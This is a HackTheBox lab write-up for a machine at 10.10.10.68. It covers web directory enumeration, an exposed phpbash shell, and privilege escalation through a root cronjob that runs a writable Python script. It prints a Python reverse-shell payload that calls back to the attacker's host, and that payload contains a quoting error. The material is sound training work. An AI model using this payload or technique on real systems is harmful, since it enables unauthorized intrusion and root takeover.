![f5864aceeefb1e406e4d5b393c89a357.png](68757d919950447c8a2723837615b2b4.png)
### Port Scanning, General Enumeration and Access (Nmap, Gobuster)
Initial scan showed that the only port available is 80 (HTTP)
![bd01656345ddccc0469e64d7205c7abb.png](a79611f0fb504d2c95e48ad41bf64257.png)
![521eab003e68c7b9b8c6a3165dbc004f.png](25a5af46355a4665aff1c3c562a5abbd.png)
Looks like a pretty neat tool, but not a lot to go on.
`gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php`
![d266d9b40f7d37741133d816aff27fa1.png](926805d2c0704027b5127fd161f124f3.png)
`/dev`?
![e5b7c370abcac44325316c5f01353d1b.png](374d569c5b8544ae9d52f43225a8d392.png)
found the phpbash thing!
![04cfb0c08f8a0ae2506dc5ea7ee84763.png](a0955a0b22924187939aebd235886bb9.png)
![dcd444ca9a402a810ff2c121f584cee2.png](04f9bd6f06fe467fa56f7a7e2cc9c1d8.png)
---
### Privesc (php reverse shell, python, cronjobs)
We can upload files to the `/uploads` directory in the webroot
![af313696df01e0877c0ea89ed433c427.png](0400838e70144b8eae257ac5820ddad8.png)
Let's get a real shell
![4fd58a133be0cd2272fdb3ea3535e5cd.png](6a01483f603b47ab839df4876f952621.png)
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
![c7e9f1b1827264ad792abbc841f4f553.png](c483f76f0a054e3fb5bc65db38e5b76d.png)
Easy enough to switch to `scriptmanager`
`sudo -u scriptmanager /bin/bash`
There's a scripts folder owned by `scriptmanager`
![1c2c10bf0ecdf6a2801ed07ec302db62.png](f59cdcfdc0884bc8b8fe0f0e38a86c5e.png)
![a54454783a3b57526f0f6f5b93f0c0c9.png](fb017495d2524ecfa59dfe3430afa544.png)
Interesting, the python script is ours but text file is owned by root?
![e670daa3f4ef1ab447080a2c41002f16.png](5e05db701753482f846bcd7b28e075ed.png)
I see, so the script runs and creates that file.
![cc2964236f7d97d6178a37695e7b97ad.png](3fa0f82b6b8a424dbefdacbf740f2032.png)
Moving the old `test.txt` to `test.txt.bak` and re-running the script we can see that the new `test.txt` is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let's test
![ed04a1a4e3e0ecfeef9462cd91c806b7.png](39b94ffd44b24eb5bb7f06e45aa19ae4.png)
It's back and with root privs!
Let's give this boring old `test.py` some fangs.
```Python
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.18,4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
```
I created the new `test.py` on my machine and transferred it over. Started a listener and...
![7d8618f99e679389e24dacb08142d003.png](b3cf254ad72549119b33e1520bb5ab13.png)
![be41b9c05ca645b4855a45b650ee1279.png](4a95bcc9d69f47838d361634b7e1239a.png)
---
Back to [[HackTheBox Index]]
Tags: #gobuster #htb #cron #python #hackthebox #box_writeups
Related: